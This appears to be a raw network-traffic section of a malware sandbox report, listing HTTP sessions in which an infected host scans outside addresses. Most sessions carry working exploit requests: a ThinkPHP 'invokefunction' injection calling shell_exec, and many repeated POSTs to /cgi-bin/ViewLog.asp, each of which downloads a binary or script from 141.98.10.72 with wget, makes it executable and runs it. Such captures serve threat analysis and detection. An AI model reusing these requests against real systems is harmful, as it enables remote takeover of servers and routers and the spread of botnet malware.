                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 33 2e 37 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.13.7</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        432192.168.2.145544688.221.73.17580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.348556995 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:50.563249111 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:50 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:50 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 66 34 39 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 30 26 23 34 36 3b 35 61 64 36 36 35 39 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;af49dd58&#46;1707899630&#46;5ad66595</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        433192.168.2.145141888.214.11.19880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:50.549360991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:50.792663097 CET242INHTTP/1.0 400 Bad Request
                                                        Connection: close
                                                        Content-Length: 113
                                                        Date: Wed, 14 Feb 2024 08:33:00 GMT
                                                        Expires: 0
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        434192.168.2.145162694.46.176.898080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.109962940 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:51.323127031 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:51 GMT
                                                        Server: Apache
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        435192.168.2.144361431.136.140.728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.120506048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:51.815152884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:53.191108942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.943094015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:01.574718952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.582422018 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:35.109360933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:20.163563967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        436192.168.2.143624231.136.122.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.120799065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:51.815150976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:53.191121101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.943108082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:01.574721098 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:12.582433939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:35.109402895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:20.163542986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        437192.168.2.143473685.241.11.548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.122746944 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        438192.168.2.144309862.29.72.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.145925999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        439192.168.2.144370494.120.18.1348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.148961067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        440192.168.2.145727231.136.48.2038080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.311811924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
